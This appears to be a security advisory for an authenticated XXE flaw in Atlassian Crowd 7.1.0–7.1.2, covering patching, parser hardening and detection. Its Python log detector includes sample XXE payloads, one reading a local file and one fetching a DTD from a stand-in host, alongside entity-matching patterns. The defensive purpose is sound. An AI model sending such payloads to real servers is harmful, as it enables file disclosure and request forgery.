CVE-2026-21569

7.9 HIGH
XXE

📋 TL;DR

This XXE vulnerability in Crowd Data Center and Server allows authenticated attackers to read local files and potentially access remote content via XML parsing. It affects organizations running Crowd versions 7.1.0 through 7.1.2, potentially leading to data exposure and service disruption.

💻 Affected Systems

Products:
  • Atlassian Crowd Data Center
  • Atlassian Crowd Server
Versions: 7.1.0 through 7.1.2
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated access to exploit. All deployments with affected versions are vulnerable by default.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attacker reads sensitive system files (passwords, configs), accesses internal network resources via SSRF, and causes denial of service through resource exhaustion.

🟠 Likely Case

Authenticated attacker reads application configuration files, potentially exposing credentials and internal system information.

🟢 If Mitigated

With proper network segmentation and XML parsing restrictions, impact is limited to local file read within the application context.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

XXE exploitation is well-documented with standard techniques. Requires authenticated user access to vulnerable XML parsing endpoints.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.1.3 or later

Vendor Advisory: https://confluence.atlassian.com/pages/viewpage.action?pageId=1712324819

Restart Required: Yes

Instructions:

1. Back up your Crowd instance.
2. Download Crowd 7.1.3+ from the Atlassian download center.
3. Stop the Crowd service.
4. Install/upgrade to the patched version.
5. Restart the Crowd service.
6. Verify the upgrade via the admin console.

🔧 Temporary Workarounds

Disable XXE Processing

Applies to: all

Configure XML parsers to disable external entity resolution.

Configure XML parser settings in the Crowd configuration to set the following features: FEATURE_SECURE_PROCESSING (http://javax.xml.XMLConstants/feature/secure-processing) = true and disallow-doctype-decl (http://apache.org/xml/features/disallow-doctype-decl) = true. With DOCTYPE declarations disallowed, inline entity declarations cannot be processed at all, so this is the stronger of the two settings.

🧯 If You Can't Patch

  • Restrict network access to Crowd instances, especially from untrusted networks
  • Implement WAF rules to block XXE payload patterns in XML requests

🔍 How to Verify

Check if Vulnerable:

Check Crowd version via admin console or application logs. Versions 7.1.0-7.1.2 are vulnerable.

Check Version:

Check Crowd admin console or application startup logs for version information

Verify Fix Applied:

Verify version is 7.1.3 or later via admin interface and test XML parsing endpoints with XXE test payloads.

📡 Detection & Monitoring

Log Indicators:

  • Unusual XML parsing errors
  • Large XML file uploads
  • Requests to internal file paths in XML payloads

Network Indicators:

  • XML requests containing external entity references
  • Outbound connections from Crowd to unexpected internal systems

SIEM Query:

source="crowd" AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*SYSTEM*")
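The SIEM query above fires on any line mentioning DOCTYPE, ENTITY or SYSTEM, which includes benign DOCTYPEs such as XHTML. As an added example (not from the advisory and not Atlassian code), the Python below narrows the match to entity declarations that reference external content, the precondition for XXE, and runs over constructed log lines; the log layout, endpoint path and URIs are assumptions.

```python
import re

# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY [%] name PUBLIC "id" "uri">.
# A leading % marks a parameter entity, commonly used to pull in a remote DTD.
EXT_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%>]+)\s+'
    r'(?P<kind>SYSTEM|PUBLIC)\s+"(?P<first>[^"]*)"(?:\s+"(?P<second>[^"]*)")?',
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def entity_risk(uri: str) -> str:
    """file: (or a bare path) means local file read; anything else is an outbound fetch."""
    scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
    return "local-file-read" if scheme in ("", "file") else "outbound-fetch"


def classify(line: str) -> dict:
    """Return a verdict for one log line plus details of any external entities found."""
    entities = []
    for m in EXT_ENTITY_RE.finditer(line):
        # PUBLIC carries a public id first, then the URI; SYSTEM carries only the URI.
        uri = m.group("second") if m.group("kind").upper() == "PUBLIC" and m.group("second") else m.group("first")
        entities.append({"name": m.group("name"), "parameter": bool(m.group("param")),
                         "uri": uri, "risk": entity_risk(uri)})
    if entities:
        verdict = "external-entity"   # alert: matches the XXE precondition
    elif DOCTYPE_RE.search(line):
        verdict = "doctype-only"      # review: DOCTYPE present, no external entity declared
    else:
        verdict = "clean"
    return {"verdict": verdict, "entities": entities}


def scan(lines):
    return [classify(line) for line in lines]


# Constructed sample lines (assumed format: timestamp, level, thread, request, body).
SAMPLE_LOGS = [
    '2026-01-15 10:01:02 INFO [http-nio-8095] POST /crowd/rest/example body=<?xml version="1.0"?><user><name>alice</name></user>',
    '2026-01-15 10:01:03 INFO [http-nio-8095] POST /crowd/rest/example body=<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html/>',
    '2026-01-15 10:01:04 WARN [http-nio-8095] POST /crowd/rest/example body=<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><x>&xxe;</x>',
    '2026-01-15 10:01:05 WARN [http-nio-8095] POST /crowd/rest/example body=<!DOCTYPE x [<!ENTITY % dtd SYSTEM "http://dtd-host.example/x.dtd"> %dtd;]><x/>',
]

if __name__ == "__main__":
    for result in scan(SAMPLE_LOGS):
        print(result["verdict"], result["entities"])
```

A "doctype-only" hit still deserves a look, since a DOCTYPE with an external subset can also reach out; the split only separates what needs an immediate alert from what needs review.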
